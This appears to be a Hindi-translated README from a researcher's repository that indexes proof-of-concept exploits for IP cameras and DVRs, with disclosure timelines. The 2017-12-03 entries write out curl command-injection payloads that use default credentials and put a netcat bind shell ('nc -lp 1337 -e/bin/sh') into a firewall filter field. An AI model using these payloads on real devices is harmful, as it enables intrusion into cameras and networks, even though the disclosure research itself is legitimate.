
Issues has been disabled for these PoC's, as they are simply PoC, Public Domain and unsupported.
विविध PoC - इंटरनेट ऑफ़ (इन)सिक्योरिटी थिंग्स
इन घटिया (अ)सुरक्षा चीज़ों के बारे में पढ़ना वाकई फायदेमंद है: https://ipvm.com/reports/security-exploits
2021-10-19
सारा श्रेय Watchful_IP (https://watchfulip.github.io/) को जाता है
https://github.com/mcw0/PoC/blob/master/CVE-2021-36260.py
2021-10-06
विवरण: https://github.com/mcw0/PoC/blob/master/Dahua%20authentication%20bypass.txt
PoC: https://github.com/mcw0/DahuaConsole
2021-09-06
दो स्वतंत्र प्रमाणीकरण बाइपास।
एक और "Dahua मास हैक" की अत्यधिक संभावना के कारण, मैं Full Disclosure विवरण 6 अक्टूबर, 2021 तक रोके रखूँगा।
तब तक फर्मवेयर अपग्रेड करने की अत्यधिक अनुशंसा करता हूँ।
https://www.dahuasecurity.com/support/cybersecurity/details/957
2020-05-09
https://github.com/mcw0/PoC/blob/master/Dahua-3DES-IMOU-PoC.py
2020-02-29
https://github.com/mcw0/Tools/blob/master/Dahua-JSON-Debug-Console-v2.py
2020-02-15
इस सप्ताह Dahua PSIRT के साथ संपर्क स्थापित किया गया, 23 अलग-अलग क्लाउड आपूर्तिकर्ताओं के लिए विवरण, PoC और प्रमाण प्रदान किए गए हैं। मैं Google Zero के नए परीक्षण 'Policy and Disclosure: 2020 Edition' का भी पालन करूँगा (क्योंकि यह मुझे उचित लगता है), यानी मैं 90 दिनों के बाद प्रकाशित करूँगा, भले ही Dahua 09.05.2020 19:00 UTC (9 मई, 2020 19:00 UTC) से पहले या बाद में अपडेट जारी करे या न करे।
Dahua, कृपया इस तिथि से पहले इसे ठीक करें और अपडेट उपलब्ध कराएँ...
संदर्भ: Google Zero 'Policy and Disclosure: 2020 Edition': https://googleprojectzero.blogspot.com/2020/01/policy-and-disclosure-2020-edition.html
2020-02-10
मैंने अभी-अभी Dahua SDK से क्रेडेंशियल लीक (साफ़ टेक्स्ट में समाप्त होने वाले) Dahua PSIRT को प्रकट किए हैं, देखते हैं कि वे इस जानकारी को कैसे लेते हैं। जब +20 अलग-अलग क्लाउड प्रदाता शामिल हों तो यह काफी बुरा है... आज से 90 दिनों की गिनती शुरू।
2020-01-20
नया रिपॉजिटरी बनाया गया है जहाँ मैं कुछ टूल्स डालने की योजना बना रहा हूँ।
सबसे पहला: Dahua-JSON-Debug-Console-v2.py
2019-10-06 (पुरानी चीज़ें)
Axis उपकरणों (1998 - 2019) के मॉडल और फर्मवेयर संस्करण का अनाम रूप से पता लगाएँ।
https://github.com/mcw0/PoC/blob/master/axis-detect.py
2019-08-20
https://github.com/mcw0/PoC/blob/master/Realtek-RTL83xx-PoC.py
2019-08-06
https://www.vdoo.com/blog/disclosing-significant-vulnerabilities-network-switches
सभी तकनीकी विवरण python PoC के साथ 20 अगस्त, 2019 को यहाँ पोस्ट किए जाएँगे।
2019-05-15
एकाधिक स्टैक ओवरफ्लो, RCE, उपयोगकर्ता नाम/पासवर्ड का साफ़ टेक्स्ट में प्रकटीकरण और भी बहुत कुछ
https://github.com/mcw0/PoC/blob/master/LifeSafetyPower-Netlink-PoC.py
2019-04-10
यह स्क्रिप्ट Dahua 'DHIP' P2P बाइनरी प्रोटोकॉल का उपयोग करेगी, जो सामान्य HTTP/HTTPS पोर्ट्स और TCP/5000 पर काम करता है
JSON का उपयोग करके Dahua उपकरणों के आंतरिक 'Debug Console' से जुड़ेगा (TCP/6789 पर पूर्व डीबग के समान प्रकार)
https://github.com/mcw0/PoC/blob/master/Dahua-DHIP-JSON-Debug-Console.py
मज़े करें, bashis
2019-01-23
नमस्ते, बहुत समय हो गया और कोई प्रकाशन नहीं...
मैं अभी भी मौजूद हूँ और अपना शोध कर रहा हूँ, लेकिन खबर यह है कि मैं विक्रेता प्रबंधन के लिए VDOO (https://www.vdoo.com/) के साथ भी काम करने का प्रयास कर रहा हूँ, और इसने दुर्भाग्य से मेरी Full Disclosure प्रक्रिया को कुछ हद तक विलंबित कर दिया है...
वैसे भी, मेरे इस GitHub पर Full Disclosure के रूप में कई दिलचस्प शोध आने वाले हैं।
VDOO के सहयोग से मैं वह कर सकता हूँ जो मुझे करना पसंद है, और उन विक्रेताओं के साथ समय बर्बाद नहीं करूँगा जो (नहीं चाहते | समझते नहीं | अनदेखा करना चाहते | विलंब करना चाहते | जो भी)।
सबसे नया कुछ Reolink (https://reolink.com/) सामग्री है, जिसे आप यहाँ पाएँगे: https://www.vdoo.com/blog/working-with-the-community-%E2%80%93-significant-vulnerabilities-in-reolink-cameras/.
2018-06-18
AVTECH {DVR/NVR/IPC} हीप ओवरफ्लो, IPCP API, RCE
https://github.com/mcw0/PoC/blob/master/Avtech_Undocumented_API_and_RCE.txt
https://github.com/mcw0/PoC/blob/master/AVTECH-IPCP-RCE.py
2018-06-03
Reolink {IPC} RCE (प्रमाणित)
https://github.com/mcw0/PoC/blob/master/Reolink-IPC-RCE.py
2018-04-09
Shenzhen TVT Digital Technology Co. Ltd और OEM {DVR/NVR/IPC} API RCE https://github.com/mcw0/PoC/blob/master/TVT_and_OEM_IPC_NVR_DVR_RCE_Backdoor_and_Information_Disclosure.txt https://github.com/mcw0/PoC/blob/master/TVT-PoC.py
2018-03-05
AVTECH {DVR/NVR/IPC} प्रमाणित RCE
https://github.com/mcw0/PoC/blob/master/AVTECH-RCE.py
2018-02-01
Geovision Inc. IP कैमरा/वीडियो/एक्सेस कंट्रोल एकाधिक रिमोट कमांड निष्पादन - एकाधिक स्टैक ओवरफ्लो - डबल फ्री - अनधिकृत एक्सेस https://github.com/mcw0/PoC/blob/master/Geovision%20IP%20Camera%20Multiple%20Remote%20Command%20Execution%20-%20Multiple%20Stack%20Overflow%20-%20Double%20free%20-%20Unauthorized%20Access.txt
Geovision Inc. IP कैमरा और वीडियो सर्वर रिमोट कमांड निष्पादन PoC https://github.com/mcw0/PoC/blob/master/Geovision-PoC.py
2018-01-22
Herospeed TelnetSwitch डेमॉन TCP/787 पर चल रहा है, telnetd को सक्षम करने की अनुमति देने के लिए। जहाँ एक छोटा स्टैक ओवरफ्लो हमें गतिशील रूप से उत्पन्न पासवर्ड को अधिलेखित करने और telnetd को सक्षम करने की अनुमति देता है। https://github.com/mcw0/PoC/blob/master/Herospeed-TelnetSwitch.py
2018-01-15
Foscam IPC फर्मवेयर इमेजेस पर विभिन्न एन्क्रिप्शन कुंजियों/डाइजेस्ट और साइफर को लूप करने के लिए छोटा OpenSSL रैपर। https://github.com/mcw0/PoC/blob/master/decrypt-foscam.py
विविध Foscam IPC बाइनरी और लाइब्रेरीज़ में स्ट्रिंग/लॉगिन/पासवर्ड/क्रिप्टोकुंजी को डीऑबफस्केट करें https://github.com/mcw0/PoC/blob/master/deobfuscate-foscam.py
2017-12-22
https://github.com/mcw0/PoC/blob/master/Vitek_RCE_and_information_disclosure.txt
2017-12-14
https://github.com/mcw0/PoC/blob/master/Remote_Stack_Format_String_multiple%20OEM.txt
2017-12-05
https://github.com/mcw0/PoC/blob/master/tiny-w3-mcw.c
2017-12-03
// 'IP Filter' सक्षम करें
curl --user ADMIN:1234 -v -X POST http://[IP:PORT]/form/formChangeFirewallState -d "state=2"
// 'IP Filter' में जोड़ें और निष्पादित करें
curl --user ADMIN:1234 -v -X POST http://[IP:PORT]/form/AddIPFilter -d "list=2&type=1&filterIp=$(nc -lp 1337 -e/bin/sh)"
// 'IP Filter' अक्षम करें
curl --user ADMIN:1234 -v -X POST http://[IP:PORT]/form/formChangeFirewallState -d "state=0"
// 'IP Filter' से हटाएँ
curl --user ADMIN:1234 -v -X POST http://[IP:PORT]/form/DeleteIPFilter -d "list=2&type=1&filterIp=$(nc -lp 1337 -e/bin/sh)"
2017-12-03
// 'IP Filter' सक्षम करें
curl --user admin:admin -v -X POST http://[IP:PORT]/form/formChangeFirewallState -d "state=2"
// 'IP Filter' में जोड़ें और निष्पादित करें
curl --user admin:admin -v -X POST http://[IP:PORT]/form/AddIPFilter -d "list=2&type=1&filterIp=$(nc -lp 1337 -e/bin/sh)"
// 'IP Filter' अक्षम करें
curl --user admin:admin -v -X POST http://[IP:PORT]/form/formChangeFirewallState -d "state=0"
// 'IP Filter' से हटाएँ
curl --user admin:admin -v -X POST http://[IP:PORT]/form/DeleteIPFilter -d "list=2&type=1&filterIp=$(nc -lp 1337 -e/bin/sh)"
नोट: काफी निश्चित हूँ कि अतिरिक्त OEM भी हैं जो समान साझा करते हैं।
2017-12-01 Axis Communications MPQT/PACS हीप ओवरफ्लो और सूचना लीकेज https://github.com/mcw0/PoC/blob/master/Axis_Communications_MPQT_PACS_Heap_Overflow_and_information_leakage.txt
2017-11-13 रिवर्स stunnel TLSv1 प्राइवेसी शेल https://github.com/mcw0/PoC/blob/master/Reverse%20stunnel%20TLSv1%20privacy%20shell.txt
2017-11-13 Vivotek IP कैमरे - रिमोट स्टैक ओवरफ्लो https://github.com/mcw0/PoC/blob/master/Vivotek%20IP%20Cameras%20-%20Remote%20Stack%20Overflow.txt
2017-10-29 Uniview RCE और एक्सपोर्ट कॉन्फ़िग PoC https://github.com/mcw0/PoC/blob/master/Uniview%20RCE%20PoC.txt
2017-10-19 Q3/2016 में एक पुराना भूला हुआ फ़ज़िंग जो RCE (PoC: रिमोट कनेक्ट बैक शेल) और /etc/shadow के रिमोट रीड की ओर ले गया। Axis को रिपोर्ट किया गया और Q3/2016 में ठीक किया गया, फिर भी इसे अभी यहाँ पोस्ट कर रहा हूँ क्योंकि यह एक अच्छा संकेत हो सकता है। https://github.com/mcw0/PoC/blob/master/Axis%20SSI%20RCE
2017-10-17 Dahua में Telnetd सक्षम / अक्षम करें (नए फर्मवेयर संस्करणों के लिए) https://github.com/mcw0/PoC/blob/master/dahua-telnetd-json.py
2017-05-03
Dahua Backdoor PoC का सार्वजनिक पुनःप्रकाशन https://github.com/mcw0/PoC/blob/master/dahua-backdoor-PoC.py
2017-03-20
अपने नए पाए गए ज्ञान के साथ कि वहाँ 1 मिलियन से अधिक Dahua / OEM इकाइयों की अविश्वसनीय संख्या में कमजोर उपकरण मौजूद हैं, जहाँ यह ज्ञान NSFOCUS द्वारा बनाई गई एक रिपोर्ट और shodan.io पर मेरे अपने शोध से आया है।
इस ज्ञान के साथ, मैं Python PoC को जनता के लिए जारी नहीं करूँगा जैसा कि पहले 5 अप्रैल के बारे में कहा गया था, क्योंकि यह आवश्यक नहीं है जब PoC को पहले ही IPVM और अन्य स्वतंत्र सुरक्षा शोधकर्ताओं द्वारा सत्यापित किया जा चुका है।
हालाँकि, यदि वांछित हो तो मैं गंभीर सुरक्षा शोधकर्ताओं के साथ PoC साझा करने के लिए तैयार हूँ, कृपया मुझे सूची से बाहर ई-मेल करें और स्पष्ट रहें कि आप कौन हैं ताकि मैं आपको भिखारी न समझूँ, जिन्हें मैं अनदेखा करता हूँ।
NSFOCUS रिपोर्ट: http://blog.nsfocus.net/dahua-cameras-unauthorized-access-vulnerability-technical-analysis-solution/
/bashis
क्या आपने Dahua के पैच पर दिनांक और समय स्टैम्प देखे? स्क्रीन शॉट्स देखें: http://us.dahuasecurity.com/en/us/Security-Bulletin_030617.php https://github.com/mcw0/PoC/blob/master/Dahua%20Wiki%20Firmware%20Timestamp.png
https://dahuawiki.com/images/Firmware/DVR/Q2.2017/ https://github.com/mcw0/PoC/blob/master/Dahua%20Wiki%20Firmware%20listing.png
सूची में केवल NVR/DVR/IPC/HDCVI ही नहीं हैं
इंटरकॉम सिस्टम भी, VTO2000A की पुष्टि हो चुकी है http://www1.dahuasecurity.com/au/products/vto2000a-762.html